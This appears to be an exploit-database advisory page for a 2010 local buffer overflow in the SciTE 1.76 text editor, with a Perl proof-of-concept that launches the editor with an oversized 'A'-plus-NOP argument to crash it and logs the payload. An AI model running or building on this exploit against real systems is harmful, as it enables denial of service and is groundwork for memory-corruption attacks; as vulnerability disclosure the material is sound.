Scite Text Editor 1.76 local buffer overflow

2010.06.30
Credit: kmkz
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

# Exploit Title: 0 Days Scite text editor :Local Buffer Overflow (PoC) # Date: 28/06/2010 # Author: kmkz # Version: [Scite 1.76 (lastest version) # Tested on: Linux 2.6.31-22 # Code : Proof of Concept #!/usr/bin/perl -wU # 0-Days PoC (Local BoF Scite 1.76) use strict; use diagnostics; use English '-no_match_vars'; use constant SUCCESS=>(1); use constant FAILLURE=>(0); use constant TARGET_BINARY=>("scite"); use constant PAYLOAD=>(`perl -e 'print "A"x4092 . "\x90\x90\x90\x90"'`); use constant VERSION =>("/usr/share/scite/SciTE.html"); BEGIN: if(-e VERSION) { foreach(VERSION) { my @version_checking=($_=~ //); @version_checking=split(/W/); next if !($' =~ m/1.76/) || warn ("[*] WARNING: not Scite Version 1.76 \012\012"); } my $Exploitation=(system( TARGET_BINARY, PAYLOAD)); open (DUMP ,">> Dump_Scite_Local_BoF_PoC.log") or warn("[-] Can't create dump_file\012\015"); printf(DUMP" [+] This PoC generate a .txt document and crash scite exploiting a local Buffer Overflow (just for example) \012\012\015"); printf("%s\012", $Exploitation ) ; printf(DUMP"[+] Run in GDB for more information (using this payload):\012 %s", PAYLOAD); close(DUMP); exit(SUCCESS); } else { printf("[!] %s : MISSING \012 [!] %s \012\012",VERSION,$!); exit(FAILLURE); } __END__ _________________________________________________________________ Hotmail : une messagerie performante et gratuite avec une scurit signe Microsoft https://signup.live.com/signup.aspx?id=60969


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top